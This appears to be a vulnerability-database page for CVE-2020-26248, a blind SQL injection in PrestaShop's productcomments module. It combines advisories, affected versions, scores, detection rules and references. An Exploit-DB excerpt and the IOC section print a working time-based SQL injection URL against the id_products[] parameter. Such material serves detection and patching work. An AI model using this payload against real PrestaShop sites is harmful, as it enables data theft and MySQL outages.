CVE-2020-26248
published 2020-12-03CVE-2020-26248: In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The…
PriorityP263high8.2CVSS 3.1
AVNACLPRNUINSUCLINAH
EXPLOIT
EPSS
12.39%
95.7th percentile
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prestashop | productcomments | < 4.2.1 | 4.2.1 |
| prestashop | productcomments | — | — |
| prestashop | productcomments | >= 4.0.0 < 4.2.1 | 4.2.1 |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]↗
urlhttp://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)↗
sigma
detection:
selection:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# digest: 4a0a00473045022100c8980629d0402e4ee52f520fd18f54d9d8ab769396ab3a6d571570e2366fd06602206969879476e8e31dcf224c4ecccbda6b11a1073874b122d0c6d44f9d9c5e160c:922c64590222798bb761d5b6d8e72950- →Monitor HTTP requests targeting the PrestaShop ProductComments module endpoint: index.php with query parameters fc=module, module=productcomments, controller=CommentGrade, and a potentially malicious id_products[] value containing SQL payloads (e.g., sleep(), nested SELECT statements). ↗
- →Alert on HTTP responses with status 200, Content-Type application/json, and body containing 'average_grade' — this is the successful exploitation response fingerprint for the blind SQLi probe against the CommentGrade controller.
- →The vulnerable parameter is 'id_products[]' (URL-encoded as id_products%5B%5D). Inspect this array parameter for time-based blind SQL injection patterns such as sleep() or nested SELECT subqueries. ↗
- ·The vulnerability is fixed in productcomments module version 4.2.1. Ensure the installed module version is 4.2.1 or later; versions <= 4.2.0 are vulnerable. ↗
CVSS provenance
nvdv3.18.2HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Blind SQL injection in PrestaShop productcomments module
ghsa·2021-01-20
CVE-2020-26248 [LOW] CWE-89 Blind SQL injection in PrestaShop productcomments module
Blind SQL injection in PrestaShop productcomments module
### Impact
An attacker can use a Blind SQL injection to retrieve data or stop the MySQL service.
### Patches
The problem is fixed in 4.2.1
OSV
Blind SQL injection in PrestaShop productcomments module
osv·2021-01-20
CVE-2020-26248 [LOW] Blind SQL injection in PrestaShop productcomments module
Blind SQL injection in PrestaShop productcomments module
### Impact
An attacker can use a Blind SQL injection to retrieve data or stop the MySQL service.
### Patches
The problem is fixed in 4.2.1
No detection rules found.
Exploit-DB
PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
exploitdb·2020-12-16·CVSS 6.8
CVE-2020-26248 [MEDIUM] PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
---
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Date: 2020-12-15
# Exploit Author: Frederic ADAM
# Author contact: [email protected]
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://github.com/PrestaShop/productcomments
# Version: 4.2.0
# Tested on: Debian 10
# CVE : CVE-2020-26248
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
Example:
http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
Nuclei
PrestaShop Product Comments <4.2.0 - SQL Injection
nuclei·CVSS 8.2
CVE-2020-26248 [HIGH] PrestaShop Product Comments <4.2.0 - SQL Injection
PrestaShop Product Comments =6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and
# digest: 4a0a00473045022100c8980629d0402e4ee52f520fd18f54d9d8ab769396ab3a6d571570e2366fd06602206969879476e8e31dcf224c4ecccbda6b11a1073874b122d0c6d44f9d9c5e160c:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.htmlhttps://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffahttps://github.com/PrestaShop/productcomments/releases/tag/v4.2.1https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9https://packagist.org/packages/prestashop/productcommentshttp://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.htmlhttps://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffahttps://github.com/PrestaShop/productcomments/releases/tag/v4.2.1https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9https://packagist.org/packages/prestashop/productcomments
2020-12-03
Published